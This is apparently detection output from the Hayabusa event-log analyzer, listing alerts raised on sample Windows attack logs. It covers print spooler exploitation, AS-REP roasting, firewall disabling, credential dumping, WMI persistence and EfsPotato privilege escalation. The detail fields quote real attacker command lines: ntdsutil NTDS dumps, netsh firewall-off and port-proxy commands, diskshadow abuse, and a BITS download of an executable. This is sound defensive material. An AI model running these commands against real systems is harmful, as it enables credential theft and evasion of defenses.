2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: 
S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 21:17:58.582 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 21:18:04.312 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 21:18:06.940 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 
0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:17:46.489 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 
0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:17:46.577 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:17:46.666 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:17:47.699 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced 
Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 18:30:48.170 +09:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 6D3C60FE-F13D-60B9-22E2-010000001D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software 
Component/ID11-Exchange transport config modified.evtx +2021-06-06 04:35:16.721 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-06 04:36:32.683 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-06 05:17:05.433 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx +2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 
04:29:58.240 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 
2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.390 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 
0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" 
+2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,info,Evas | Persis,Bits Job Created,Job Title: test | URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx +2021-08-08 08:32:57.348 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"" /n ""C:\Users\IEUser\Desktop\stats.doc"" | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 3424 | PGUID: 747F3D96-1829-610F-0000-0010A33FD200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | Process: C:\Windows\SysWOW64\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x7a857 | PID: 9932 | PGUID: 747F3D96-182D-610F-0000-00106F40D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.103 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: 
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 11196 | PGUID: 747F3D96-182D-610F-0000-00100344D300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:01.176 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" c:\users\public\memViewData.jpg,PluginInit | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\mshta.exe"" ""C:\Users\Public\memViewData.hta"" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} | LID: 0x7a857 | PID: 6576 | PGUID: 747F3D96-1834-610F-0000-00105FE5D300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:08.346 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe | Process: 
C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x7a857 | PID: 11324 | PGUID: 747F3D96-183B-610F-0000-0010DC6CD400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-08 08:33:15.303 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/maldoc_mshta_via_shellbrowserwind_rundll32.evtx +2021-08-17 21:26:51.403 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-17 21:26:51.457 +09:00,LAPTOP-JU4M3I0E,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx +2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: c:\temp\EfsPotato.exe whoami | Process: C:\temp\EfsPotato.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ""cmd.exe"" | LID: 0x3e4 | PID: 14048 | PGUID: 00247C92-A691-6122-0000-001021C31F02",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,info,,Pipe Created,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: c:\temp\EfsPotato.exe | PID: 14048 | PGUID: 
00247C92-A691-6122-0000-001021C31F02,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.881 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 00247C92-707C-6122-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx +2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,info,,Pipe Connected,\dd4c18dc-bff6-42ce-b707-62c114b84291\pipe\srvsvc | Process: System | PID: 4 | 